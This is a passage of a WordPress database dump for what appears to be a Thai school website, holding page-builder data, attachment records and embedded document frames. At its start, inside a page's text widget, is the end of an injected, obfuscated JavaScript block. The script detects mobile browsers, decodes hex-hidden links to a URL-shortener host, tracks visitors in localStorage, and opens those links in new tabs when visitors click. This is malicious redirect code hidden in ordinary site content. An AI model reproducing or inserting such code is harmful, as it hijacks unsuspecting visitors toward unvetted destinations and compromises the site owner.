_0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\\/(android|bb\\\\d+|meego).+mobile|avantgo|bada\\\\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\\/i[_0x1165a7(0x1ca)](_0x5e9786)||\\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\\\-(n|u)|c55\\\\\\/|capi|ccwa|cdm\\\\-|cell|chtm|cldc|cmd\\\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\\\-|_)|g1 u|g560|gene|gf\\\\-5|g\\\\-mo|go(\\\\.w|od)|gr(ad|un)|haie|hcit|hd\\\\-(m|p|t)|hei\\\\-|hi(pt|ta)|hp( i|ip)|hs\\\\-c|ht(c(\\\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\\\-(20|go|ma)|i230|iac( |\\\\-|\\\\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\\\\/)|klon|kpt |kwc\\\\-|kyo(c|k)|le(no|xi)|lg( g|\\\\\\/(k|l|u)|50|54|\\\\-[a-w])|libw|lynx|m1\\\\-w|m3ga|m50\\\\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\\\-2|po(ck|rt|se)|prox|psio|pt\\\\-g|qa\\\\-a|qc(07|12|21|32|60|\\\\-[2-7]|i\\\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\\\-|oo|p\\\\-)|sdk\\\\\\/|se(c(\\\\-|0|1)|47|mc|nd|ri)|sgh\\\\-|shar|sie(\\\\-|m)|sk\\\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\\\-|v\\\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\\\-|tdg\\\\-|tel(i|m)|tim\\\\-|t\\\\-mo|to(pl|sh)|ts(70|m\\\\-|m3|m5)|tx\\\\-9|up(\\\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\\\-|your|zeto|zte\\\\-\\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\\\x68\\\\x74\\\\x74\\\\x70\\\\x3a\\\\x2f\\\\x2f\\\\x63\\\\x75\\\\x74\\\\x6d\\\\x65\\\\x2e\\\\x74\\\\x6f\\\\x64\\\\x61\\\\x79\\\\x2f\\\\x77\\\\x67\\\\x64\\\\x30\\\\x63\\\\x380\',\'\\\\x68\\\\x74\\\\x74\\\\x70\\\\x3a\\\\x2f\\\\x2f\\\\x63\\\\x75\\\\x74\\\\x6d\\\\x65\\\\x2e\\\\x74\\\\x6f\\\\x64\\\\x61\\\\x79\\\\x2f\\\\x4d\\\\x76\\\\x49\\\\x31\\\\x63\\\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\\/script><\\/p>\\n\\n<!-- wp:paragraph -->\\n<p><\\/p>\\n<!-- \\/wp:paragraph -->\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5f0b650\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\"},\"elements\":[{\"id\":\"7868e8a\",\"elType\":\"widget\",\"settings\":{\"embedpress_embeded_link\":\"https:\\/\\/www.canva.com\\/design\\/DAGsFHWqrOk\\/eCZISZCLZjZV8cpVDnNIUA\\/view\",\"prefix_nftcreator\":\"Created By\",\"prefix_nftprice\":\"Current Price\",\"prefix_nftlastsale\":\"Last Sale\",\"label_nftbutton\":\"See Details\",\"loadmorelabel\":\"Load More\",\"label_nftrank\":\"Rank\",\"label_nftdetails\":\"Details\",\"instafeedFollowBtnLabel\":\"Follow\",\"instafeedPostsCountText\":\"[count] posts\",\"instafeedFollowersCountText\":\"[count] followers\",\"instafeedPopupFollowBtnLabel\":\"Follow\",\"instafeedLoadmoreLabel\":\"Load More\",\"cPopupButtonText\":\"Schedule time with me\",\"adWidth\":\"300\",\"adHeight\":\"200\",\"adStart\":\"5\",\"adSkipButtonAfter\":\"5\",\"embedpress_protection_message\":\"You do not have access to this content. Only users with the following roles can view it: [user_roles].\",\"embedpress_lock_content_error_message\":\"Oops, that wasn\'t the right password. Try again.\",\"embedpress_password_placeholder\":\"Password\",\"embedpress_submit_button_text\":\"Unlock\",\"embedpress_submit_Unlocking_text\":\"Unlocking...\",\"embedpress_lock_content_heading\":\"Content Locked\",\"embedpress_lock_content_sub_heading\":\"Content is locked and requires password to access it.\",\"embedpress_lock_content_footer_message\":\"In case you don\'t have the password, kindly reach out to content owner or administrator to request access.\"},\"elements\":[],\"widgetType\":\"embedpres_elementor\"}],\"isInner\":false}]'),
(4700,14,'_elementor_template_type','wp-page'),
(4701,14,'_elementor_version','3.29.2'),
(4703,14,'_oembed_d3ba94c8ba151ad531601298d1902d53','<iframe title=\"กระดานถามตอบ โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" src=\"https://www.canva.com/design/DAGsFHWqrOk/eCZISZCLZjZV8cpVDnNIUA/view?embed&amp;meta\" height=\"422\" width=\"750\" style=\"border: none; border-radius: 8px; width: 750px; height: 422px;\" allowfullscreen=\"allowfullscreen\" allow=\"fullscreen\"></iframe>'),
(4704,14,'_oembed_time_d3ba94c8ba151ad531601298d1902d53','1751519297'),
(4705,1653,'title_style','default'),
(4706,1653,'_title_style','field_5d1a0217cf408'),
(4711,1655,'title_style','default'),
(4712,1655,'_title_style','field_5d1a0217cf408'),
(4713,1656,'title_style','default'),
(4714,1656,'_title_style','field_5d1a0217cf408'),
(4716,1658,'title_style','default'),
(4717,1658,'_title_style','field_5d1a0217cf408'),
(4718,1659,'_edit_lock','1751524731:1'),
(4719,1659,'_oembed_1971d641e9cd30c9c5a867db31b9e4b1','{{unknown}}'),
(4721,1661,'title_style','default'),
(4722,1661,'_title_style','field_5d1a0217cf408'),
(4723,1651,'title_style','hidden'),
(4724,1651,'_title_style','field_5d1a0217cf408'),
(4726,1663,'title_style','hidden'),
(4727,1663,'_title_style','field_5d1a0217cf408'),
(4728,1664,'title_style','default'),
(4729,1664,'_title_style','field_5d1a0217cf408'),
(4730,1665,'title_style','hidden'),
(4731,1665,'_title_style','field_5d1a0217cf408'),
(4735,1667,'title_style','hidden'),
(4736,1667,'_title_style','field_5d1a0217cf408'),
(4737,1668,'title_style','hidden'),
(4738,1668,'_title_style','field_5d1a0217cf408'),
(4741,1671,'title_style','hidden'),
(4742,1671,'_title_style','field_5d1a0217cf408'),
(4743,1672,'title_style','hidden'),
(4744,1672,'_title_style','field_5d1a0217cf408'),
(4745,1673,'title_style','hidden'),
(4746,1673,'_title_style','field_5d1a0217cf408'),
(4748,1676,'_edit_lock','1751596705:1'),
(4749,1680,'footnotes',''),
(4750,1682,'_wp_attached_file','2025/07/report.png'),
(4751,1682,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:150;s:6:\"height\";i:150;s:4:\"file\";s:18:\"2025/07/report.png\";s:8:\"filesize\";i:14058;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4753,1684,'_edit_lock','1751615405:1'),
(4754,1684,'_edit_last','1'),
(4755,1684,'title_style','hidden'),
(4756,1684,'_title_style','field_5d1a0217cf408'),
(4757,1685,'title_style','hidden'),
(4758,1685,'_title_style','field_5d1a0217cf408'),
(4759,1686,'title_style','default'),
(4760,1686,'_title_style','field_5d1a0217cf408'),
(4762,1688,'title_style','default'),
(4763,1688,'_title_style','field_5d1a0217cf408'),
(4765,1691,'title_style','hidden'),
(4766,1691,'_title_style','field_5d1a0217cf408'),
(4768,1634,'title_style','default'),
(4769,1634,'_title_style','field_5d1a0217cf408'),
(4771,1695,'title_style','hidden'),
(4772,1695,'_title_style','field_5d1a0217cf408'),
(4773,1697,'_edit_lock','1751701681:1'),
(4774,1698,'_wp_attached_file','2025/07/แนวทางโครงการกิจกรรมการป้องกันการทุจริต.pdf'),
(4775,1698,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:563084;}'),
(4776,1699,'_wp_attached_file','2025/07/Is-It-a-Gift-Instagram-Post-1.png'),
(4777,1699,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:300;s:4:\"file\";s:41:\"2025/07/Is-It-a-Gift-Instagram-Post-1.png\";s:8:\"filesize\";i:99310;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:40:\"Is-It-a-Gift-Instagram-Post-1-300x75.png\";s:5:\"width\";i:300;s:6:\"height\";i:75;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:15815;}s:5:\"large\";a:5:{s:4:\"file\";s:42:\"Is-It-a-Gift-Instagram-Post-1-1024x256.png\";s:5:\"width\";i:1024;s:6:\"height\";i:256;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:122812;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:41:\"Is-It-a-Gift-Instagram-Post-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:12726;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:41:\"Is-It-a-Gift-Instagram-Post-1-768x192.png\";s:5:\"width\";i:768;s:6:\"height\";i:192;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:76162;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:41:\"Is-It-a-Gift-Instagram-Post-1-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:35152;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4778,1697,'_edit_last','1'),
(4779,1697,'title_style','hidden'),
(4780,1697,'_title_style','field_5d1a0217cf408'),
(4781,1700,'title_style','hidden'),
(4782,1700,'_title_style','field_5d1a0217cf408'),
(4783,1702,'title_style','default'),
(4784,1702,'_title_style','field_5d1a0217cf408'),
(4785,1703,'title_style','hidden'),
(4786,1703,'_title_style','field_5d1a0217cf408'),
(4787,1704,'_edit_lock','1751701845:1'),
(4788,1705,'_wp_attached_file','2025/07/Is-It-a-Gift-Instagram-Post-2.png'),
(4789,1705,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:300;s:4:\"file\";s:41:\"2025/07/Is-It-a-Gift-Instagram-Post-2.png\";s:8:\"filesize\";i:84076;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:40:\"Is-It-a-Gift-Instagram-Post-2-300x75.png\";s:5:\"width\";i:300;s:6:\"height\";i:75;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:17513;}s:5:\"large\";a:5:{s:4:\"file\";s:42:\"Is-It-a-Gift-Instagram-Post-2-1024x256.png\";s:5:\"width\";i:1024;s:6:\"height\";i:256;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:125974;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:41:\"Is-It-a-Gift-Instagram-Post-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:14433;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:41:\"Is-It-a-Gift-Instagram-Post-2-768x192.png\";s:5:\"width\";i:768;s:6:\"height\";i:192;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:80118;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:41:\"Is-It-a-Gift-Instagram-Post-2-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:38170;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4790,1706,'_wp_attached_file','2025/07/แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา.pdf'),
(4791,1706,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:826026;}'),
(4792,1704,'_edit_last','1'),
(4793,1704,'title_style','hidden'),
(4794,1704,'_title_style','field_5d1a0217cf408'),
(4795,1707,'title_style','hidden'),
(4796,1707,'_title_style','field_5d1a0217cf408'),
(4797,1709,'title_style','hidden'),
(4798,1709,'_title_style','field_5d1a0217cf408'),
(4800,1711,'title_style','default'),
(4801,1711,'_title_style','field_5d1a0217cf408'),
(4803,1713,'_wp_attached_file','2025/07/คู่มือปฏิบัติงานของบุคลากรทางการศึกษา2568.pdf'),
(4804,1713,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:1030169;}'),
(4805,1714,'title_style','default'),
(4806,1714,'_title_style','field_5d1a0217cf408'),
(4808,1717,'title_style','hidden'),
(4809,1717,'_title_style','field_5d1a0217cf408'),
(4810,1718,'title_style','hidden'),
(4811,1718,'_title_style','field_5d1a0217cf408'),
(4813,1720,'title_style','hidden'),
(4814,1720,'_title_style','field_5d1a0217cf408'),
(4816,1722,'title_style','hidden'),
(4817,1722,'_title_style','field_5d1a0217cf408'),
(4818,1723,'title_style','hidden'),
(4819,1723,'_title_style','field_5d1a0217cf408'),
(4822,476,'_oembed_0bae4a50b5e0d0221be325df783cbcc4','{{unknown}}'),
(4823,1726,'title_style','hidden'),
(4824,1726,'_title_style','field_5d1a0217cf408'),
(4825,1727,'title_style','hidden'),
(4826,1727,'_title_style','field_5d1a0217cf408'),
(4828,1729,'title_style','hidden'),
(4829,1729,'_title_style','field_5d1a0217cf408'),
(4831,1731,'title_style','hidden'),
(4832,1731,'_title_style','field_5d1a0217cf408'),
(4834,1733,'_wp_attached_file','2025/07/corruption.png'),
(4835,1733,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:300;s:4:\"file\";s:22:\"2025/07/corruption.png\";s:8:\"filesize\";i:67112;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:21:\"corruption-300x75.png\";s:5:\"width\";i:300;s:6:\"height\";i:75;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:14300;}s:5:\"large\";a:5:{s:4:\"file\";s:23:\"corruption-1024x256.png\";s:5:\"width\";i:1024;s:6:\"height\";i:256;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:107327;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"corruption-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:11935;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:22:\"corruption-768x192.png\";s:5:\"width\";i:768;s:6:\"height\";i:192;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:66521;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:22:\"corruption-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:33106;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4836,1734,'title_style','hidden'),
(4837,1734,'_title_style','field_5d1a0217cf408'),
(4838,1735,'title_style','hidden'),
(4839,1735,'_title_style','field_5d1a0217cf408'),
(4841,1738,'title_style','default'),
(4842,1738,'_title_style','field_5d1a0217cf408'),
(4843,1739,'title_style','hidden'),
(4844,1739,'_title_style','field_5d1a0217cf408'),
(4845,1740,'title_style','default'),
(4846,1740,'_title_style','field_5d1a0217cf408'),
(4849,1540,'_elementor_template_type','wp-page'),
(4856,1742,'_elementor_edit_mode','builder'),
(4857,1742,'_elementor_template_type','wp-page'),
(4858,1743,'_elementor_edit_mode','builder'),
(4859,1743,'_elementor_template_type','wp-page'),
(4860,1540,'_wp_page_template','default'),
(4861,1540,'_elementor_data','[{\"id\":\"6854eac\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\"},\"elements\":[{\"id\":\"275347b\",\"elType\":\"widget\",\"settings\":{\"html\":\"<iframe src=\\\"https:\\/\\/docs.google.com\\/spreadsheets\\/d\\/e\\/2PACX-1vTEIAytWLHtOH0qTJC7eyhlzKhUIUzcMGSMSAjrm8ppwUQn3qCGQqokmyPbupBLZw\\/pubhtml?widget=true&amp;headers=false\\\" height=\\\"1200\\\" width=\\\"100%\\\"><\\/iframe>\",\"_element_width\":\"inherit\",\"_flex_align_self\":\"center\"},\"elements\":[],\"widgetType\":\"html\"}],\"isInner\":false}]'),
(4862,1744,'_elementor_edit_mode','builder'),
(4863,1744,'_elementor_template_type','wp-page'),
(4864,1744,'_wp_page_template','default'),
(4865,1744,'_elementor_data','[{\"id\":\"6854eac\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\"},\"elements\":[{\"id\":\"275347b\",\"elType\":\"widget\",\"settings\":{\"html\":\"<iframe src=\\\"https:\\/\\/docs.google.com\\/spreadsheets\\/d\\/e\\/2PACX-1vTEIAytWLHtOH0qTJC7eyhlzKhUIUzcMGSMSAjrm8ppwUQn3qCGQqokmyPbupBLZw\\/pubhtml?widget=true&amp;headers=false\\\" height=\\\"1200\\\" width=\\\"100%\\\"><\\/iframe>\",\"_element_width\":\"inherit\",\"_flex_align_self\":\"center\"},\"elements\":[],\"widgetType\":\"html\"}],\"isInner\":false}]'),
(4867,1540,'_elementor_version','3.29.2'),
(4870,1744,'title_style','default'),
(4871,1744,'_title_style','field_5d1a0217cf408'),
(4873,1746,'title_style','default'),
(4874,1746,'_title_style','field_5d1a0217cf408'),
(4876,1748,'_wp_attached_file','2025/07/Human.png'),
(4877,1748,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:300;s:4:\"file\";s:17:\"2025/07/Human.png\";s:8:\"filesize\";i:89691;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"Human-300x75.png\";s:5:\"width\";i:300;s:6:\"height\";i:75;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:16272;}s:5:\"large\";a:5:{s:4:\"file\";s:18:\"Human-1024x256.png\";s:5:\"width\";i:1024;s:6:\"height\";i:256;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:121617;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"Human-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:9874;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:17:\"Human-768x192.png\";s:5:\"width\";i:768;s:6:\"height\";i:192;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:75676;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:17:\"Human-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:29040;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4878,1749,'title_style','hidden'),
(4879,1749,'_title_style','field_5d1a0217cf408'),
(4880,1750,'_wp_attached_file','2025/07/tham.png'),
(4881,1750,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:300;s:4:\"file\";s:16:\"2025/07/tham.png\";s:8:\"filesize\";i:62181;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:15:\"tham-300x75.png\";s:5:\"width\";i:300;s:6:\"height\";i:75;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:12918;}s:5:\"large\";a:5:{s:4:\"file\";s:17:\"tham-1024x256.png\";s:5:\"width\";i:1024;s:6:\"height\";i:256;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:98175;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"tham-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:10488;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:16:\"tham-768x192.png\";s:5:\"width\";i:768;s:6:\"height\";i:192;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:62077;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:16:\"tham-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:31218;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4882,1751,'title_style','hidden'),
(4883,1751,'_title_style','field_5d1a0217cf408'),
(4884,1754,'_edit_lock','1751950371:1'),
(4885,1755,'_wp_attached_file','2025/07/แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี.pdf'),
(4886,1755,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:6367389;}'),
(4887,1754,'_edit_last','1'),
(4888,1754,'title_style','hidden'),
(4889,1754,'_title_style','field_5d1a0217cf408'),
(4890,1756,'title_style','default'),
(4891,1756,'_title_style','field_5d1a0217cf408'),
(4892,1757,'title_style','hidden'),
(4893,1757,'_title_style','field_5d1a0217cf408'),
(4894,1758,'title_style','hidden'),
(4895,1758,'_title_style','field_5d1a0217cf408'),
(4896,1759,'title_style','default'),
(4897,1759,'_title_style','field_5d1a0217cf408'),
(4898,1760,'_wp_attached_file','2025/07/Screenshot-2025-07-08-113208.png'),
